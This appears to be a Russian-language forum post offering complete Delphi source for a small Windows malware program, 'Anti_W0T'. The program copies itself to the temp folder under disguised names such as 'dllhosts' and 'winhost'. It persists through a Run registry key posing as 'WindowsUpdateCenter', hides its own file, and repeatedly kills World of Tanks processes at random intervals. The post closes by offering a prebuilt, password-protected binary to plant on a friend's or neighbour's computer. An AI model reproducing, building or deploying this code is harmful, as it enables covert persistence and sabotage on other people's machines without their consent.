0
Оно умеет:
1) Автозапуск.
2) Скрывает файлы на диске.
3) Случайное имя процесса и файла на диске.
4) Работает из временной папки пользователя.
5) И главное, мешает работе WotldOfTancks.
////////////////////////////////////////
// Code By DarckSol *ICQ*335*949*335*
// *ArtWork*
////////////////////////////////////////
program Anti_W0T;
uses
windows,
Tlhelp32,
sysutils,
registry;
var
intervalup:integer;
sleeptime:integer;
const
regrootkey = HKEY_CURRENT_USER;
SysParams = $00000004;
HideParam = $00000002;
Launcher = 'WOTLauncher.exe';
W_0_T = 'WorldOfTanks.exe';
Function WoT_PROC_DIA(ExeFileName: String): Integer; stdcall;
const
PROCESS_TERMINATE = $0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin try
Result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while Integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(
OpenProcess(PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
finally
end;
end;
Function xGenerator():string;
var
xname:array[0..19] of string;
Buffer: array[0..1023] of Char;
iResult:string;
begin
try
SetString(iResult, Buffer, GetTempPath(Sizeof(Buffer) - 1, Buffer));
//------------------------NameGen-----------
xname[0]:='WorldofTanckLauncher';
xname[1]:='mkuses';
xname[2]:='wininet';
xname[3]:='explorers';
xname[4]:='System';
xname[5]:='WorlOfTanckUpdate';
xname[6]:='lasso';
xname[7]:='xmodeupdate';
xname[8]:='LauncherMod';
xname[9]:='dllhosts';
xname[10]:='mss.dll';
xname[11]:='smssole';
xname[12]:='sqlitel';
xname[13]:='winhost';
xname[14]:='monhosts';
xname[15]:='oracle';
xname[16]:='.';
xname[17]:='e';
xname[18]:='x';
xname[19]:='e';
randomize;
result:=iResult+xname[random(15)]+xname[16]+xname[17]+xname[18]+xname[19];
except
end;
end;
Function hident():bool;
var
I:integer;
ran:integer;
begin
for I := 0 to 1 do begin
//---
if i = 0 then
begin
windows.SetFileAttributes(pchar(paramstr(0)), SysParams);
randomize;
ran:=random(500);
ran:=ran+random(600)-100*1+100-121+100+21;
sleep(ran);
end;
if i = 1 then
begin
ran:=random(300)+random(100)+random(400)+random(300)-121*1+121;
sleep(ran);
windows.SetFileAttributes(pchar(paramstr(0)),HideParam);
end;
end;
end;
Procedure RegMyPlz;
var
reg:TRegistry;
xNP:string;
begin
try
xNP:=xGenerator;
copyfile(pchar(paramstr(0)),PChar(xNP),true);
reg:=TRegistry.Create;
reg.RootKey:=regrootkey;
reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);
reg.WriteString('WindowsUpdateCenter',xNP);
reg.CloseKey;
reg.Destroy;
reg:=TRegistry.Create;
reg.RootKey:=regrootkey;
reg.OpenKey('Software\Microsoft',true);
if reg.OpenKey('WinWoT', true)=false then reg.CreateKey('WinWoT') else
reg.WriteString('0x0810123','0x00000072');
reg.CloseKey;
reg.Free;
except
end;
end;
Function check():boolean; //Start RegMyPlz
var
uCh:tregistry;
begin
try
uCH:=TRegistry.Create;
uCH.RootKey:=regrootkey;
uCH.OpenKey('\Software\Microsoft\WinWoT',true);
if uCH.ReadString('0x0810123') ='0x00000072' then
begin
result:=true;
end else
begin
RegMyPlz;
result:=false;
end;
finally
end;
end;
Function GetSleepTime():integer;
var
interval:integer;
options:array[0..9] of integer;
begin
options[0]:=300000; // 3 min
options[1]:=420000; // 4 min
options[2]:=900000; // 15 min
options[3]:=780000; // 13 min
options[4]:=840000; // 14 min
options[5]:=540000; // 5 min
options[6]:=270000;
options[7]:=420000;
options[8]:=150000;
options[9]:=450000;
randomize;
interval:=options[random(9)];
result:=interval;
end;
Procedure Start3;
begin
WoT_PROC_DIA(Launcher);
sleep(500);
WoT_PROC_DIA(W_0_T);
end;
Procedure Start1;
begin
if WoT_PROC_DIA(W_0_T) = 0 then WoT_PROC_DIA(Launcher);
end;
Procedure Start2;
begin
if WoT_PROC_DIA(Launcher) = 0 then WoT_PROC_DIA(W_0_T);
end;
Procedure Start_dia;
var
randomstart:array[0..9] of integer;
IStart:Integer;
begin
randomstart[0]:=0;
randomstart[1]:=1;
randomstart[2]:=2;
randomstart[3]:=3;
randomstart[4]:=4;
randomstart[5]:=5;
randomstart[6]:=6;
randomstart[7]:=7;
randomstart[8]:=8;
randomstart[9]:=9;
randomize;
IStart:=randomstart[random(9)];
if IStart = 0 then start1 else
if IStart = 1 then start2 else
if IStart = 2 then start3 else
if IStart = 3 then start2 else
if IStart = 4 then start1 else
if IStart = 5 then start3 else
if IStart = 6 then start1 else
if IStart = 7 then start2 else
if IStart = 8 then start1 else
if IStart = 9 then start3;
//--------------------
end;
//----BODY----
begin
intervalup:=15;
intervalup:=intervalup-5-5-3-2;
check;
hident;
for intervalup := 1 to 999999909 do
begin
sleep(random(9009));
sleeptime:=GetSleepTime;
Start_dia;
sleep(sleeptime);
sleeptime:=0;
end;
end.
Для тех, у кого рук не хватает, что бы собрать код самому, выкладываю уже готовый файл для подарка другу/соседу.Download
Download
Passwd: prolog.su.passwd
Наверх
...
?
